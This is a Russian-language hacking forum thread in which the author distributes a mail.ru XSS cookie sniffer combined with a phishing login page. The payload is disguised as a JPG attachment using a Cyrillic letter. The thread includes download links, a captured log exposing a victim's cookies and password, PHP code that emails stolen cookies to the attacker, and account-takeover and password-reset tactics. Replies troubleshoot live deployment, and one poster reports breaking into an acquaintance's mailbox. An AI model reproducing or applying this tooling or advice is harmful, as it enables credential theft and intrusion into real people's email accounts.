Всем привет :)

Возможно байан, и всёже...

XSS нашёл не я, нашёл вот кто http://webxakep.net/articles/articles-internet/1601-krazha-cookies-na-mail.ru.html но там описана тупо XSS а мы сейчас додумаем сами, как сделать всё поумнее...
/*Кстати хочу сказать что почему-то не у всех это работает, у некоторых при отправке атача <script> заменяется на <xscript> возможно это зависит от браузера, у меня опера 9.62 и всё норм*/
Дальше идёт строго моя импровизация :)
С XSS проблем не будет, надо подумать насчёт фейка... Мы будем выводить страницу входа, надо чтобы мыло отображалось в поле "Имя" ну как стандартный мэйловский вход, для этого надо отпарсить куку "Mpop". Быстро в гуголе нашёл скрипт и взялся за работу
/*Час спустя :) */
Сделал, из кук читается логин, домен и вводится в форму, также при нажатии на кнопку сабмита изменяется action формы, чтобы в опере не палился сниффер при наводе на кнопку :)
URL сниффера надо прописать в функцию x3k_get_action() - найдёте её через Ctrl+F :) (это файл фото)
Автор статьи что я указал выше рекомендует использовать имя файла с расширением .img но это палево, хоть и не большое, но палево, и зачем палиться если этого можно избежать. Способ прибежал в голову секунда за 15 :)
Изменяем формат файла на .jpg Но буква p это не английская ПЭ а русская ЭР, таким образом всё хорошо :) Но вы возможно придумаете для экономии времени такой способ - заходить в "Отправленные" и перенаправлять время следующей жертве, не советую... При первой отправке если мы отправили "фото.jpg" то он так и придёт жертве, а при перенаправке он превратиться в "foto.jrg" а нам этого не надо, поэтому пишите каждый раз письмо заново.
http://rapidshare.com/files/171369388/mail.ru_sniff_fake.rar.html
http://depositfiles.com/files/rbmgdj9vw
А архиве 4 файла
.htaccess - запрещает доступ к логу из веба
mail-sniffer.log - сюда будут идти куки с XSS и данные с фейка
mail-sniffer.php - сам сниффер который всё обрабатывает
S000001436.jрg - "кагбе" фотография.
Она весит 22кб, если вам кажется этого мало для фотографии, можете дополнить текстом <noscript><!-- много разного мусора на пару десятков/сотен кб --></noscript>
Чёт я ещё хотел сказать... Забыл, вспомню скажу :)
А! Вспомнил! Если жертва не повелась на фейк, пришли только куки, не всё потеряно, прём на вконтакт (все знают что это, не надо объяснять?) высылаем пасс на мыло (98% жертв зареганы на вконтакте) нам приходит пасс, в 85% случаев пасс подходит к мылу, если не на вконтакте, порыскайте почту, должны быть письма с разными регистрациями и высыланиями паролей :)
Ах да! Ещё! Если пришли только куки, то удаляйте всё кроме "Mpop" эта кука самая главная и с её помощью вы сможете лазить по всем сервисам mail.ru (чаты, знакомства, игры) если вы оставите ещё какую-то куку то есть вероятность что куда-то вас не пустят
А! Ещё! В PHP скрипте сниффера защита от школьников, так что не забудьте поправить
Ага! Ещё! Зайдите в "фотографию" и в функции "x3k_get_action()" измените URL сниффера
Ну и ещё... На файл mail-sniffer.log должны быть права на запись
Вроде-бы всё
Видео тем кто не догнал :rolleyes:
http://rapidshare.com/files/171401947/mail.ru_xss_sniff.rar.html
http://depositfiles.com/files/rscltc8se

(c)Ponchik - forum.antichat.ru

На яндексе тоже похожая была, там алерты вылетали даже из txt кажись.
Молодец, +++

Тама кстате в PHP скрипте
header("Location: http://win.mail.ru/cgi-bin/movemsg?remove&id=$id");
Вот если 2 раза заставить жертву зайти по этой ссыле письмо удалиться полностью, но я игрался, игрался с картинками на JS, не получилось, не моё это :(

Перезалейте куда-нить..))

Fepsis, http://depositfiles.com/files/rbmgdj9vw
Перенесите кто-то тему в E-Mail ато я чёто тупанул

==========================
Прилетело с сниффера (12.08.08 11:36:54)
IP: 213.134.205.214
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRSPUTNIK 2, 0, 0, 36 SW; MRA 5.1 (build 02243); MAXTHON 2.0)
Ref: http://af6.mail.ru/cgi-bin/readmsg/S000001436.jrg?id=12287289880000026372;0;1&mode=attachment&channel=
Cookie: VID=0QIH4Y15S9Wa; mrcu=2E50492BE75132D7D7D5D6CD86D5; p=n8m/AbnPqgAA; __utma=56108983.1778233777.1227614052.1228484981.1 228726826.16; __utmz=56108983.1228484981.15.13.utmccn=(referral) |utmcsr=2.chat.mail.ru|utmcct=/cgi-xml/info|utmcmd=referral; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAABAAAAAAAAAAAdABcDvAcA; c240=TR5bSQAAAAKF7QMAAAAAApONAQAAAAAA; c8=94o9SQAAAAH5UgIAAAAAAm0OAQAAAAACkYICAAAAAAKTUwQ AAAAAApJJAgAAAAAClX4BAAAA; Mpop=1228728991:424c0163005d0842190502190a1d00041c 05034f6a5d5e465e07050501071e0809001e5c4b5757555451 145a545858194b44:erofeef@mail.ru:-; __utmc=56108983; ticket=f9469fd8-8e2d-4977-ab40-2c1f10c89e04:erofeef@mail.ru
==========================
Прилетело с фейка (12.08.08 11:37:00)
IP: 213.134.205.214
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRSPUTNIK 2, 0, 0, 36 SW; MRA 5.1 (build 02243); MAXTHON 2.0)
Ref: http://af6.mail.ru/cgi-bin/readmsg/S000001436.jrg?id=12287289880000026372;0;1&mode=attachment&channel=
Мыло из кук: erofeef@mail.ru
Мыло которое ввела жертва: erofeef@mail.ru
Пасс который ввела жертва: 7771

Стыдно, стыдно :D

Молодец!!! Хорошая статья =))
Но сейчас будет куча вопросов... Так что лучше видео запиши =)

Tigger, тож думал над этим, щас запишу :)

Молодец интересно.

Снял видео, но тама смареть нечего, щас пойдут вопросы "А я когда открываю 192.168.0.1/O_o у меня пишет невозможно отобразить" и "А где скачать VMware и возможно-ли через неё ломать акки вконтакте" Х_Х

Видео, это гуд)
А на счёт вопросов, то это естествинно...нада ведь новичкам как то развиватся)
Молодец, +1 )

Молодец. Если можеш, слей ещё раз а то с рапиды вроде удалили, или у меня лажа.

Кста, способ ещё пашет? Авось прикрыли?

блин уже не пашет, просит запрос на скачивание файла :(

Arigona, у мя всё норм работает, открывает фейк, куки идут, всё норм :)

Ponchik,извени, наверно на фирефоксе не пашет. Огромный респект за проделанную работу

перезалейте на рапиду

http://rapidshare.com/files/174280184/mail.ru_sniff_fake.rar.html

было бы интересно увидеть еще проверку, так как если неправильный пароль был введен то и зайти мы не можем

Сегодня вот, кстати, с Паросом игрался, нашел раскрытие пути :


Can't open /usr/local/www/mail.ru/data/mywap/.templates/Redir.tmpl : No such file or directory
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://wap.my.mail.ru/cgi-bin/my/reg?back_after_reg=http://wap.my.mail.ru/?noclear=1">here</A>.<P>
</BODY></HTML>

login999, чёто я непонял... А причём тут мой фейк?

login999, чёто я непонял... А причём тут мой фейк?

Фейк твой ни при чем, просто запостил в тему, где упоминалась mail.ru (мож кому пригодится). Звиняй, если что не так
П.С. - если захочешь, то снесу ... :)

плз дайте рабочий линк!!!!

http://rapidshare.com/files/174280184/mail.ru_sniff_fake.rar.html - рабочий вполне

А чё XSS ещё живая О_о
DIMON4G, ппц, это защита от школьников, убери пост

http://rapidshare.com/files/174280184/mail.ru_sniff_fake.rar.html - рабочий вполне

нет, не работает

У меня на снифф приходят только данные с фейка :(

Все?? похоже прикрыли?

неннаю ,посмотрел видео но вот насчет Vmware я нечего непонял ,гугил чтоб понять как её поставить но нечего непонял ,но всё равно молодец !! ЗАчет

пишет ошибку Parse error: syntax error, unexpected T_STRING in /home/a6256423/public_html/mail/mail-sniffer.php on line 7
когда вводишь пароль и наживаешь войти

посмотрел видео но вот насчет Vmware я нечего непонял ,гугил чтоб понять как её поставить но нечего непонял Вообще-то устанавливать виртуальную машину вовсе не обязательно, что бы проверить, работает ли всё.
пишет ошибку Parse error: syntax error, unexpected T_STRING in /home/a6256423/public_html/mail/mail-sniffer.php on line 7 когда вводишь пароль и наживаешь войтиВ этой строчке защита от школьников.

А вот у меня вопрос такой: Как задать разрешение не запись? Или посоветуйте хост, где можно так сделать. И вообще на видео у чела "домашний" Apache сервак. Так как быть?

А! Всё, ребят, не надо. Сам допер. И кукисы и с фейка приходит! +5 Ponchik'у )))

С чем связано, один отчет пришел с куками которые не ставят пароль при обновлении странички.. другой отчет все хорошо... и логин и пароль???

С чем связано, один отчет пришел с куками которые не ставят пароль при обновлении странички.. другой отчет все хорошо... и логин и пароль???Ты наверно забыл удалить все остальные куки от mail.ru, у меня всё работает. Это насчет первого. А насчет другого отчета - ПОБЕДА!!!
Ставь + Ponchick'у!
Только 1 '-' в том, что жертва обязана обязательно открыть фото прямо из браузера :(

хех, после видео допёрло как работает данный фейк))) гг)

Хм, а ваще зачётная вещь!
Только пашед на ИЕ, в опере не кушает + письмо не удаляется...
--------------------
прошёл тест на знакомой, на фейк не повелась, но через куки вошёл в её мыло... вопрос терь в другом, сменить пасс или изменить данные для восстановления низя, нужен пасс... как его раздобыть?
возможно ли методом "сохранить пароль" фишкой оперы, а потом из файлов оперы вытянуть его? прога у меня есть... только не могу потестить, я отключил запоминалку паролей для мыла.ру (((

to Ponchik , спасибо с меня ++ ))
А возможно сделать что-б работала тема и на мозилу? а то просит скачать сцуко (

добавил "оповещение на мыло", когда жертва прошла сниффер, на мыло придут куки... каму над:
в mail-sniffer.php, в куске работы снифера (до "}else{") вставляем код и меняем мыла на свои:

$from = "user@mail.ru"; // от кого письмо
$to = "user@mail.ru"; // кому присылаем данные

$subj = " Куки"; // тема письма
$body = " Cookie: $cookie"; // тело письма

$from="From: $from\nReply-To: $from\nX-Priority: 1\nContent-Type: text/plain; charset=\"koi8-r\"\nContent-Transfer-Encoding: 8bit";
$from=convert_cyr_string($from,"w","k");
$to=convert_cyr_string($to,"w","k");
$subj=convert_cyr_string($subj,"w","k");
$body=convert_cyr_string($body,"w","k");
mail($to,$subj,$body,$from);

что за ерунда может быть, обычно нормальные куки, все заходит под ними, а щас какаято ерунда:

Mpop=123279321:0654495076630d6419050219a1d00051c00 074f6a5d5e465e010d061b03077a1f5b445a52416e46584714 5e5b535b4f174345:xxxxxx@inbox.ru:-;

и не заходит под ними.. :/ меня смущает минус в конце.. в чем дело?

возможно в минусе дело... никогда минуса не видел, хз

вот вопрос тоже на счёт куков... в строке с Mpop есть следующее:
geo_city_id=xxxx;
где можно расшифровать город? гуглил, ничего не нашёл...

Итак, может я и новичок, но последнюю неделю я в этом деле очень поднялся.возможно в минусе дело... никогда минуса не видел, хзC минусом мне тоже приходило, все работает. Другое дело, что вам приходит не зашифрованный пароль, а некий хеш сессии. А она не долговечна (У mail.ru около часа). Так что их надо подставлять вовремя, а потом "система запоминания паролей" + СИ вам в помощь. Далее для ПЕТРА и остальных: функция mail(); проста, но работает в основном только на платных серваках, иначе самому надо размещать и настраивать sendmail (http://ru.wikipedia.org/wiki/Sendmail) а это не приведи господь...

Ждите новый топик, в котором я выложу очень неплохой вариант, где будет реализована моя система оповещения+удобный интерфейс обработки логов.

Далее для ПЕТРА и остальных: функция mail(); проста, но работает в основном только на платных серваках
ну эт да, я на платнике сижу (ресселер), пока живой))
Так что их надо подставлять вовремя, а потом "система запоминания паролей" + СИ вам в помощь
а можно про это поподробнее? типа как пасс узнать? вроде мне отвечали что в куках физически его нет (мне не понятно почему тогда заходит)
ща например весь день захожу на мыло под куками, а вот пасс не наю =\
Ждите новый топик, в котором я выложу очень неплохой вариант, где будет реализована моя система оповещения+удобный интерфейс обработки логов.
своим оповещение доволен... а вот на счёт логов... приходиться сразу лезть через ftp и смареть... хорошо бы на сам деле сделать удобный просмотр!

а можно про это поподробнее? типа как пасс узнать? вроде мне отвечали что в куках физически его нет (мне не понятно почему тогда заходит)Там такая вроде такая фишка: когда жертва вводит логин и пасс, mail.ru открывает сессию и единственная "проверка на вшивость" хеш из Mpop. Когда же мы подставляем куки, он при обновлении страницы выводит нам логин и пасс(звездачками), думая, что мы - жертва. Opera пароль вроде сохраняет (по крайней мере у меня).А именно узнать сам пароль наверно проще всего с помощью СИ: пароли на форумах, ВКОНТАКТЕ, и т.д.

А про мой скрипт - к 3 часам ночи допишу)))

Там такая вроде такая фишка: когда жертва вводит логин и пасс, mail.ru открывает сессию и единственная "проверка на вшивость" хеш из Mpop. Когда же мы подставляем куки, он при обновлении страницы выводит нам логин и пасс(звездачками), думая, что мы - жертва. Opera пароль вроде сохраняет (по крайней мере у меня).А именно узнать сам пароль наверно проще всего с помощью СИ: пароли на форумах, ВКОНТАКТЕ, и т.д.

А про мой скрипт - к 3 часам ночи допишу)))
ОМГ!!!!!!!!!!!!!!!! я писал про это!!!! мне утёрли нос что так нельзя!!!
а если опера сохранит логин/пасс, то я знаю способ его увидеть, у мя прога есь на флехе, все пасы на компе видит, включая оперу, её жезлы и т.д.
проблема у мя в другом, я сам не могу сохранить эти логин/пасс в опере, так как для mail.ru нажал "никогда не запоминать"((((((((((( а теперь вот нужна эта фишка, а не робит! не знаешь как обратно включить запоминалку для именно этого сайта мыло.ру?

хмм...народ, чет трабла. делаю все как по видео (кста, фтп от народа идет?) отправляю жпегу себе для проверки. Попадаю на страницу фейка, ввожу данные, вход и .... попадаю прям на фтп притом на файл что прилетело! + пишет
..."IP: {$_SERVER['REMOTE_ADDR']}\r\n".... и все тоже самое с остальными полями! Че за бред!

хмм...народ, чет трабла. делаю все как по видео (кста, фтп от народа идет?) отправляю жпегу себе для проверки. Попадаю на страницу фейка, ввожу данные, вход и .... попадаю прям на фтп притом на файл что прилетело! + пишет
..."IP: {$_SERVER['REMOTE_ADDR']}\r\n".... и все тоже самое с остальными полями! Че за бред!
ты кажись не правильно указал адрес своего сервера и путь до скрипта в файле-картинке, имхо

штука нужная этот сниф...для тех кто хочет легко и быстро...

А про мой скрипт - к 3 часам ночи допишу)))
Будем ждать твой скрипт...

штука нужная этот сниф...для тех кто хочет легко и быстро...
Только катит если жертва перешла по картинке-ссылке...
Например я гружу почту через Opera, поэтому это не прокатит для "продвинутых пользователей", обидно =\

а ктонить фейк 11х11 может скинуть?))

мне тут VlaDis асю всё нагибает... при заходе на фейк у него в поле юзера написано
masha_smile_
и говорит вот такая шняга... у меня всё норм поэтому исходник картинки-фейка я особо не смотрел, а этот товарищ заставил глянуть и мы видим значения заполнения поля "Login" значением "masha_smile_", вот строчка:
<td width=63%><input type="text" name="Login" value="masha_smile_" class=w_100></td>
походу ТС, сохранил исходник странички и делая фейк забыл стереть поля value=" " или это так и задуманно?

мне тут VlaDis асю всё нагибает...
извеняюсь...хочу просто разобраться в чем проблема уже 2 день.

Ponchik подскажи в чем проблема, все исправлено как надо (ошибку для школьников, показал адрес снифа, дал разрешение логу снифера)...но касяк. Помогите...

извеняюсь...хочу просто разобраться в чем проблема уже 2 день.

Ponchik подскажи в чем проблема, все исправлено как надо (ошибку для школьников, показал адрес снифа, дал разрешение логу снифера)...но касяк. Помогите...
раз всё у нас с тобой одинакого и всё норм в файлах, то дело из-за хостинга мб... просто больше не из-за чего тут косякам быть, хз

раз всё у нас с тобой одинакого и всё норм в файлах, то дело из-за хостинга мб... просто больше не из-за чего тут косякам быть, хз
Люди...подскажите, кто на каком хостинге...походу всетаки это хостинг виновник...

Ponchik...тут проблема с твоим снифером...
Подскажи пожалуйста на каких хостингах его использовать можно, использовал на холм не идет...Касяк вообщем, у нас с XSTream все одинаково - у него приходят логи у меня нет, помоги...
Заранее спасибо! :)

Ребят, а пофиксили чтоль? Месяц назад было норм, а сейчас при нажатии на *.jрg появляется окно на скачивание((

ПНарод помагите пажалусто поправить защита от школьников на твоем сниффере. У мня говорит Parse error: syntax error, unexpected T_STRING in C:\AppServ\www\sniff\mail-sniffer.php on line 7 помоги с этим зарания СПОСИБО

Она для того и защита,чтобы от школьников защищать.
Смысл прост: если ты школьник - не снимеш эту супер-упер защиу,не школьнег то снимеш запросто.Это знание приходит посл окончания 11 класса,на выпускной.

Она для того и защита,чтобы от школьников защищать.
Смысл прост: если ты школьник - не снимеш эту супер-упер защиу,не школьнег то снимеш запросто.Это знание приходит посл окончания 11 класса,на выпускной.
:D

все пофиксили ... теперь только после открыть кидайте на сниафа ... и приходит теперь как нежелательная почта ((((

Нечего не понимаю(( как исправиш зашиту от школников???

Ребят, а пофиксили чтоль? Месяц назад было норм, а сейчас при нажатии на *.jрg появляется окно на скачивание((

Работало еще вчера! У кого есть какие варианты как обойти защиту?

Работало еще вчера! У кого есть какие варианты как обойти защиту?
Так и щас работает... Почему формат JPG? Прояви фантазию...можно заменить букву
и все получится...

Ребят, а пофиксили чтоль? Месяц назад было норм, а сейчас при нажатии на *.jрg появляется окно на скачивание((От браузера все зависит. В Мозиле только скачивать дано, ну или открыть с помощью...
В Опере - пашет
В IE - пашет
C Google Chrome - точно не прокатит!!!

От браузера все зависит. В Мозиле только скачивать дано, ну или открыть с помощью...
В Опере - пашет
В IE - пашет
C Google Chrome - точно не прокатит!!!
Да в том то и дело, что независимо от браузера, он ее все равно предлогает скачать!

Так и щас работает... Почему формат JPG? Прояви фантазию...можно заменить букву
и все получится...
Нет уже не получится! Я что только уже не пробывал!

Пофиксили походу :(

у меня все работает...странно

как написать ссылку так чтобы Браузер открыл ее в этом же окне, А не в новом?

Неделю назад работал этот метод, а щас после нажатия перекидывает на авторизацию с уже вставленным в окно логина: masha_smile_ ,
и при вводе пароля пишет ошибку: Resource not Found на странице http://af5.mail.ru/cgi-bin/readmsg/auth , и логов на хосте нет...
В чем проблемма?
Как это исправить?

Хммм.... а у меня и до эого не до доходит.
При открытие полученного "рисунка", вылетает алерт (открыть) (сохранить)
Редко кто надавит открыть... да если и открыть откроется в новом окне...(((

Ах да, а что за "защита от школьников" ?

Независимо от браузера, он ее все равно предлогает скачать!

Возможно ли это исправить?

со сниффера и фейка инфо прилетает но все бесполезные
ни куки , логина, пароли

моей девушки прислали фейк, только без кражи куков вроде, тупо вложение формата html, которое открывалось как письмо, там была левая ссылка на фейк, при заходе по ссылке писалась ошибка и страница авторизации... она у меня работает за компом, не глупая, НО попалась на этот фейк... хорошо что мне сказала про странное письмо и я тут же сменил её пароль/данные восстановления...
да, фейк был как "вам прислали открытку", при "авторизации" показывалась ошибка "У вас не установлен последний версии flash-проигрыватель"

p.s. зачем я написал всё это - потому что этот фейк вроде работает, мб кому пригодиться для размышления :) она юзает Opera

Пётр, такие открытки уже лет 5 в ходу)

lmns, я не о том! А о том что это работает вроде.
Ибо сейчас если посылать вложения - то его пытается сохранить автоматом, а если ссылкой писать - защита "предупреждение о переходе на левый ресурс".
Есесно начиналось всё это с простых "открыток", но фейки усовершенствовались со временем из-за обхода защит, вот этот например (XSS + фейк (2 в 1)) хорошо работал и почти не палился как юзверем так и системой мыло.ру... но защита тоже обновляется и он сейчас походу уже безнадёжен.

ждем обновлений